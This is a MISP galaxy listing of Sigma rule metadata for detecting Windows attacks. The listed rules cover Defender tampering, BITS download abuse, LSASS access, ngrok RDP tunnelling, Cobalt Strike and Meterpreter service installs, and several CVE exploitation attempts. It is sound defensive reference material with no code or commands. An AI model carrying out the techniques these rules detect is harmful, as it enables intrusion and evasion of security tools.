UUID 49e5bc24-8b86-49f1-b743-535f332c2856 which can be used as unique global reference for Microsoft Defender Tamper Protection Trigger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj, Nasreddine Bencherchali
creation_date 2021/07/05
falsepositive ['Administrator might try to disable defender features during testing (must be investigated)']
filename win_defender_tamper_protection_trigger.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender AMSI Trigger Detected

Detects triggering of AMSI by Windows Defender.

Internal MISP references

UUID ea9bf0fa-edec-4fb8-8b78-b119f2528186 which can be used as unique global reference for Windows Defender AMSI Trigger Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2020/09/14
falsepositive ['Unlikely']
filename win_defender_malware_detected_amsi_source.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Windows Defender Real-time Protection Disabled

Detects disabling of Windows Defender Real-time Protection. As this event doesn't contain a lot of information on who initaited this action you might want to reduce it to a "medium" level if this occurs too many times in your environment

Internal MISP references

UUID b28e58e4-2a72-4fae-bdee-0fbe904db642 which can be used as unique global reference for Windows Defender Real-time Protection Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113
creation_date 2020/07/28
falsepositive ['Administrator actions (should be investigated)', 'Seen being triggered occasionally during Windows 8 Defender Updates']
filename win_defender_real_time_protection_disabled.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Malware And PUA Scanning Disabled

Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software

Internal MISP references

UUID bc275be9-0bec-4d77-8c8f-281a2df6710f which can be used as unique global reference for Windows Defender Malware And PUA Scanning Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113
creation_date 2020/07/28
falsepositive ['Unknown']
filename win_defender_malware_and_pua_scan_disabled.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Virus Scanning Feature Disabled

Detects disabling of the Windows Defender virus scanning feature

Internal MISP references

UUID 686c0b4b-9dd3-4847-9077-d6c1bbe36fcb which can be used as unique global reference for Windows Defender Virus Scanning Feature Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113
creation_date 2020/07/28
falsepositive ['Unknown']
filename win_defender_virus_scan_disabled.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Exclusions Added

Detects the Setting of Windows Defender Exclusions

Internal MISP references

UUID 1321dc4e-a1fe-481d-a016-52c45f0c8b4f which can be used as unique global reference for Windows Defender Exclusions Added in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/07/06
falsepositive ['Administrator actions']
filename win_defender_config_change_exclusion_added.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

LSASS Access Detected via Attack Surface Reduction

Detects Access to LSASS Process

Internal MISP references

UUID a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98 which can be used as unique global reference for LSASS Access Detected via Attack Surface Reduction in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2018/08/26
falsepositive ['Google Chrome GoogleUpdate.exe', 'Some Taskmgr.exe related activity']
filename win_defender_asr_lsass_access.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Windows Defender Real-Time Protection Failure/Restart

Detects issues with Windows Defender Real-Time Protection features

Internal MISP references

UUID dd80db93-6ec2-4f4c-a017-ad40da6ffe81 which can be used as unique global reference for Windows Defender Real-Time Protection Failure/Restart in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Christopher Peacock '@securepeacock' (Update)
creation_date 2023/03/28
falsepositive ["Some crashes can occur sometimes and the event doesn't provide enough information to tune out these cases. Manual exception is required"]
filename win_defender_real_time_protection_errors.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Malware Detection History Deletion

Windows Defender logs when the history of detected infections is deleted.

Internal MISP references

UUID 2afe6582-e149-11ea-87d0-0242ac130003 which can be used as unique global reference for Windows Defender Malware Detection History Deletion in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cian Heasley
creation_date 2020/08/13
falsepositive ['Deletion of Defender malware detections history for legitimate reasons']
filename win_defender_history_delete.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

Windows Defender Grace Period Expired

Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.

Internal MISP references

UUID 360a1340-398a-46b6-8d06-99b905dc69d2 which can be used as unique global reference for Windows Defender Grace Period Expired in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský, frack113
creation_date 2020/07/28
falsepositive ['Unknown']
filename win_defender_antimalware_platform_expired.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Submit Sample Feature Disabled

Detects disabling of the "Automatic Sample Submission" feature of Windows Defender.

Internal MISP references

UUID 91903aba-1088-42ee-b680-d6d94fe002b0 which can be used as unique global reference for Windows Defender Submit Sample Feature Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/06
falsepositive ['Administrator activity (must be investigated)']
filename win_defender_config_change_sample_submission_consent.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Threat Detected

Detects actions taken by Windows Defender malware detection engines

Internal MISP references

UUID 57b649ef-ff42-4fb0-8bf6-62da243a1708 which can be used as unique global reference for Windows Defender Threat Detected in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ján Trenčanský
creation_date 2020/07/28
falsepositive ['Unlikely']
filename win_defender_threat.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Windows Defender Configuration Changes

Detects suspicious changes to the Windows Defender configuration

Internal MISP references

UUID 801bd44f-ceed-4eb6-887c-11544633c0aa which can be used as unique global reference for Windows Defender Configuration Changes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/06
falsepositive ['Administrator activity (must be investigated)']
filename win_defender_suspicious_features_tampering.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Windows Defender Exploit Guard Tamper

Detects when someone is adding or removing applications or folders from exploit guard "ProtectedFolders" or "AllowedApplications"

Internal MISP references

UUID a3ab73f1-bd46-4319-8f06-4b20d0617886 which can be used as unique global reference for Windows Defender Exploit Guard Tamper in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/05
falsepositive ['Unlikely']
filename win_defender_config_change_exploit_guard_tamper.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

Win Defender Restored Quarantine File

Detects the restoration of files from the defender quarantine

Internal MISP references

UUID bc92ca75-cd42-4d61-9a37-9d5aa259c88b which can be used as unique global reference for Win Defender Restored Quarantine File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/06
falsepositive ['Legitimate administrator activity restoring a file']
filename win_defender_restored_quarantine_file.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

PSExec and WMI Process Creations Block

Detects blocking of process creations originating from PSExec and WMI commands

Internal MISP references

UUID 97b9ce1e-c5ab-11ea-87d0-0242ac130003 which can be used as unique global reference for PSExec and WMI Process Creations Block in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bhabesh Raj
creation_date 2020/07/14
falsepositive ['Unknown']
filename win_defender_asr_psexec_wmi.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.lateral_movement', 'attack.t1047', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

BITS Transfer Job Downloading File Potential Suspicious Extension

Detects new BITS transfer job saving local files with potential suspicious extensions

Internal MISP references

UUID b85e5894-9b19-4d86-8c87-a2f3b81f0521 which can be used as unique global reference for BITS Transfer Job Downloading File Potential Suspicious Extension in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/01
falsepositive ["While the file extensions in question can be suspicious at times. It's best to add filters according to your environment to avoid large amount false positives"]
filename win_bits_client_new_transfer_saving_susp_extensions.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

BITS Transfer Job With Uncommon Or Suspicious Remote TLD

Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.

Internal MISP references

UUID 6d44fb93-e7d2-475c-9d3d-54c9c1e33427 which can be used as unique global reference for BITS Transfer Job With Uncommon Or Suspicious Remote TLD in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/10
falsepositive ['This rule doesn\'t exclude other known TLDs such as ".org" or ".net". It\'s recommended to apply additional filters for software and scripts that leverage the BITS service']
filename win_bits_client_new_transfer_via_uncommon_tld.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

BITS Transfer Job Download To Potential Suspicious Folder

Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location

Internal MISP references

UUID f8a56cb7-a363-44ed-a82f-5926bb44cd05 which can be used as unique global reference for BITS Transfer Job Download To Potential Suspicious Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename win_bits_client_new_trasnfer_susp_local_folder.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

New BITS Job Created Via PowerShell

Detects the creation of a new bits job by PowerShell

Internal MISP references

UUID fe3a2d49-f255-4d10-935c-bda7391108eb which can be used as unique global reference for New BITS Job Created Via PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/01
falsepositive ['Administrator PowerShell scripts']
filename win_bits_client_new_job_via_powershell.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

BITS Transfer Job Download From Direct IP

Detects a BITS transfer job downloading file(s) from a direct IP address.

Internal MISP references

UUID 90f138c1-f578-4ac3-8c49-eecfd847c8b7 which can be used as unique global reference for BITS Transfer Job Download From Direct IP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename win_bits_client_new_transfer_via_ip_address.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

New BITS Job Created Via Bitsadmin

Detects the creation of a new bits job by Bitsadmin

Internal MISP references

UUID 1ff315dc-2a3a-4b71-8dde-873818d25d39 which can be used as unique global reference for New BITS Job Created Via Bitsadmin in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/01
falsepositive ['Many legitimate applications or scripts could leverage "bitsadmin". This event is best correlated with EID 16403 via the JobID field']
filename win_bits_client_new_job_via_bitsadmin.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

BITS Transfer Job Download From File Sharing Domains

Detects BITS transfer job downloading files from a file sharing domain.

Internal MISP references

UUID d635249d-86b5-4dad-a8c7-d7272b788586 which can be used as unique global reference for BITS Transfer Job Download From File Sharing Domains in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/06/28
falsepositive ['Unknown']
filename win_bits_client_new_transfer_via_file_sharing_domains.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1197']
Related clusters

To see the related clusters, click here.

Certificate Private Key Acquired

Detects when an application acquires a certificate private key

Internal MISP references

UUID e2b5163d-7deb-4566-9af3-40afea6858c3 which can be used as unique global reference for Certificate Private Key Acquired in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Zach Mathis
creation_date 2023/05/13
falsepositive ['Legitimate application requesting certificate exports will trigger this. Apply additional filters as needed']
filename win_capi2_acquire_certificate_private_key.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1649']
Related clusters

To see the related clusters, click here.

Ngrok Usage with Remote Desktop Service

Detects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour

Internal MISP references

UUID 64d51a51-32a6-49f0-9f3d-17e34d640272 which can be used as unique global reference for Ngrok Usage with Remote Desktop Service in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/29
falsepositive ['Unknown']
filename win_terminalservices_rdp_ngrok.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

Failed DNS Zone Transfer

Detects when a DNS zone transfer failed.

Internal MISP references

UUID 6d444368-6da1-43fe-b2fc-44202430480e which can be used as unique global reference for Failed DNS Zone Transfer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Zach Mathis
creation_date 2023/05/24
falsepositive ['Unlikely']
filename win_dns_server_failed_dns_zone_transfer.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.reconnaissance', 'attack.t1590.002']
Related clusters

To see the related clusters, click here.

DNS Server Error Failed Loading the ServerLevelPluginDLL

Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded

Internal MISP references

UUID cbe51394-cd93-4473-b555-edf0144952d9 which can be used as unique global reference for DNS Server Error Failed Loading the ServerLevelPluginDLL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/08
falsepositive ['Unknown']
filename win_dns_server_susp_server_level_plugin_dll.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1574.002']
Related clusters

To see the related clusters, click here.

Windows Update Error

Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.

Internal MISP references

UUID 13cfeb75-9e33-4d04-b0f7-ab8faaa95a59 which can be used as unique global reference for Windows Update Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/04
falsepositive ['Unknown']
filename win_system_susp_system_update_error.yml
level informational
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.resource_development', 'attack.t1584']
Related clusters

To see the related clusters, click here.

Critical Hive In Suspicious Location Access Bits Cleared

Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.

Internal MISP references

UUID 39f919f3-980b-4e6f-a975-8af7e507ef2b which can be used as unique global reference for Critical Hive In Suspicious Location Access Bits Cleared in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/05/15
falsepositive ['Unknown']
filename win_system_susp_critical_hive_location_access_bits_cleared.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Potential RDP Exploit CVE-2019-0708

Detect suspicious error on protocol RDP, potential CVE-2019-0708

Internal MISP references

UUID aaa5b30d-f418-420b-83a0-299cb6024885 which can be used as unique global reference for Potential RDP Exploit CVE-2019-0708 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Lionel PRAT, Christophe BROCAS, @atc_project (improvements)
creation_date 2019/05/24
falsepositive ['Bad connections or network interruptions']
filename win_system_rdp_potential_cve_2019_0708.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1210', 'car.2013-07-002']
Related clusters

To see the related clusters, click here.

Volume Shadow Copy Mount

Detects volume shadow copy mount via Windows event log

Internal MISP references

UUID f512acbf-e662-4903-843e-97ce4652b740 which can be used as unique global reference for Volume Shadow Copy Mount in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)
creation_date 2020/10/20
falsepositive ['Legitimate use of volume shadow copy mounts (backups maybe).']
filename win_system_volume_shadow_copy_mount.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.002']
Related clusters

To see the related clusters, click here.

Suspicious Usage of CVE_2021_34484 or CVE 2022_21919

During exploitation of this vulnerability, two logs (Provider_Name:Microsoft-Windows-User Profiles Service) with EventID 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \Users\TEMP is created may be created during the exploitation. Viewed on 2008 Server

Internal MISP references

UUID 52a85084-6989-40c3-8f32-091e12e17692 which can be used as unique global reference for Suspicious Usage of CVE_2021_34484 or CVE 2022_21919 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Cybex
creation_date 2022/08/16
falsepositive ['Corrupted user profiles - https://social.technet.microsoft.com/wiki/contents/articles/3571.windows-user-profiles-service-event-1511-windows-cannot-find-the-local-profile-and-is-logging-you-on-with-a-temporary-profile.aspx']
filename win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.execution']

NTFS Vulnerability Exploitation

This the exploitation of a NTFS vulnerability as reported without many details via Twitter

Internal MISP references

UUID f14719ce-d3ab-4e25-9ce6-2899092260b0 which can be used as unique global reference for NTFS Vulnerability Exploitation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/01/11
falsepositive ['Unlikely']
filename win_system_ntfs_vuln_exploit.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.impact', 'attack.t1499.001']
Related clusters

To see the related clusters, click here.

Local Privilege Escalation Indicator TabTip

Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode

Internal MISP references

UUID bc2e25ed-b92b-4daa-b074-b502bdd1982b which can be used as unique global reference for Local Privilege Escalation Indicator TabTip in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/10/07
falsepositive ['Unknown']
filename win_system_lpe_indicators_tabtip.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1557.001']
Related clusters

To see the related clusters, click here.

NTLMv1 Logon Between Client and Server

Detects the reporting of NTLMv1 being used between a client and server. NTLMv1 is insecure as the underlying encryption algorithms can be brute-forced by modern hardware.

Internal MISP references

UUID e9d4ab66-a532-4ef7-a502-66a9e4a34f5d which can be used as unique global reference for NTLMv1 Logon Between Client and Server in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/04/26
falsepositive ['Environments that use NTLMv1']
filename win_system_lsasrv_ntlmv1.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.lateral_movement', 'attack.t1550.002']
Related clusters

To see the related clusters, click here.

Potential CVE-2021-42287 Exploitation Attempt

The attacker creates a computer object using those permissions with a password known to her. After that she clears the attribute ServicePrincipalName on the computer object. Because she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.

Internal MISP references

UUID e80a0fee-1a62-4419-b31e-0d0db6e6013a which can be used as unique global reference for Potential CVE-2021-42287 Exploitation Attempt in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/15
falsepositive ['Unknown']
filename win_system_exploit_cve_2021_42287.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.credential_access', 'attack.t1558.003']
Related clusters

To see the related clusters, click here.

smbexec.py Service Installation

Detects the use of smbexec.py tool by detecting a specific service installation

Internal MISP references

UUID 52a85084-6989-40c3-8f32-091e12e13f09 which can be used as unique global reference for smbexec.py Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Omer Faruk Celik
creation_date 2018/03/20
falsepositive ['Unknown']
filename win_system_hack_smbexec.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.lateral_movement', 'attack.execution', 'attack.t1021.002', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Stdin - System

Detects Obfuscated Powershell via Stdin in Scripts

Internal MISP references

UUID 487c7524-f892-4054-b263-8a0ace63fc25 which can be used as unique global reference for Invoke-Obfuscation Via Stdin - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_stdin_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Meterpreter or Cobalt Strike Getsystem Service Installation - System

Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation

Internal MISP references

UUID 843544a7-56e0-4dcc-a44f-5cc266dd97d6 which can be used as unique global reference for Meterpreter or Cobalt Strike Getsystem Service Installation - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Ecco, Florian Roth (Nextron Systems)
creation_date 2019/10/26
falsepositive ['Unlikely']
filename win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1134.001', 'attack.t1134.002']
Related clusters

To see the related clusters, click here.

Remote Access Tool Services Have Been Installed - System

Detects service installation of different remote access tools software. These software are often abused by threat actors to perform

Internal MISP references

UUID 1a31b18a-f00c-4061-9900-f735b96c99fc which can be used as unique global reference for Remote Access Tool Services Have Been Installed - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Connor Martin, Nasreddine Bencherchali
creation_date 2022/12/23
falsepositive ['Unknown']
filename win_system_service_install_remote_access_software.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Anydesk Remote Access Software Service Installation

Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.

Internal MISP references

UUID 530a6faa-ff3d-4022-b315-50828e77eef5 which can be used as unique global reference for Anydesk Remote Access Software Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/11
falsepositive ['Legitimate usage of the anydesk tool']
filename win_system_service_install_anydesk.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.persistence']

Important Windows Service Terminated Unexpectedly

Detects important or interesting Windows services that got terminated unexpectedly.

Internal MISP references

UUID 56abae0c-6212-4b97-adc0-0b559bb950c3 which can be used as unique global reference for Important Windows Service Terminated Unexpectedly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/14
falsepositive ['Rare false positives could occur since service termination could happen due to multiple reasons']
filename win_system_service_terminated_unexpectedly.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

New PDQDeploy Service - Client Side

Detects PDQDeploy service installation on the target system. When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name "PDQDeployRunner-X" where "X" is an integer starting from 1

Internal MISP references

UUID b98a10af-1e1e-44a7-bab2-4cc026917648 which can be used as unique global reference for New PDQDeploy Service - Client Side in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/22
falsepositive ['Legitimate use of the tool']
filename win_system_service_install_pdqdeploy_runner.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

RemCom Service Installation

Detects RemCom service installation and execution events

Internal MISP references

UUID 9e36ed87-4986-482e-8e3b-5c23ffff11bf which can be used as unique global reference for RemCom Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/07
falsepositive ['Unknown']
filename win_system_service_install_remcom.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

PAExec Service Installation

Detects PAExec service installation

Internal MISP references

UUID de7ce410-b3fb-4e8a-b38c-3b999e2c3420 which can be used as unique global reference for PAExec Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/26
falsepositive ['Unknown']
filename win_system_service_install_paexec.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation RUNDLL LAUNCHER - System

Detects Obfuscated Powershell via RUNDLL LAUNCHER

Internal MISP references

UUID 11b52f18-aaec-4d60-9143-5dd8cc4706b9 which can be used as unique global reference for Invoke-Obfuscation RUNDLL LAUNCHER - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_rundll_services.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use Rundll32 - System

Detects Obfuscated Powershell via use Rundll32 in Scripts

Internal MISP references

UUID 641a4bfb-c017-44f7-800c-2aee0184ce9b which can be used as unique global reference for Invoke-Obfuscation Via Use Rundll32 - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename win_system_invoke_obfuscation_via_use_rundll32_services.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Windows Service Terminated With Error

Detects Windows services that got terminated for whatever reason

Internal MISP references

UUID acfa2210-0d71-4eeb-b477-afab494d596c which can be used as unique global reference for Windows Service Terminated With Error in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/14
falsepositive ['False positives could occur since service termination could happen due to multiple reasons']
filename win_system_service_terminated_error_generic.yml
level low
logsource.category No established category
logsource.product windows
tags ['attack.defense_evasion']

PowerShell Scripts Installed as Services

Detects powershell script installed as a Service

Internal MISP references

UUID a2e5019d-a658-4c6a-92bf-7197b54e2cae which can be used as unique global reference for PowerShell Scripts Installed as Services in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020/10/06
falsepositive ['Unknown']
filename win_system_powershell_script_installed_as_service.yml
level high
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

CSExec Service Installation

Detects CSExec service installation and execution events

Internal MISP references

UUID a27e5fa9-c35e-4e3d-b7e0-1ce2af66ad12 which can be used as unique global reference for CSExec Service Installation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/07
falsepositive ['Unknown']
filename win_system_service_install_csexecsvc.yml
level medium
logsource.category No established category
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

CobaltStrike Service Installations - System

Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement

Internal MISP references

UUID 5a105d34-05fc-401e-8553-272b45c1522d which can be used as unique global reference for CobaltStrike Service Installations - System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Wojciech Lesicki
creation_date 2021/05/26
falsepositive ['Unknown']
filename win_system_cobaltstrike_service_installs.yml
level critical
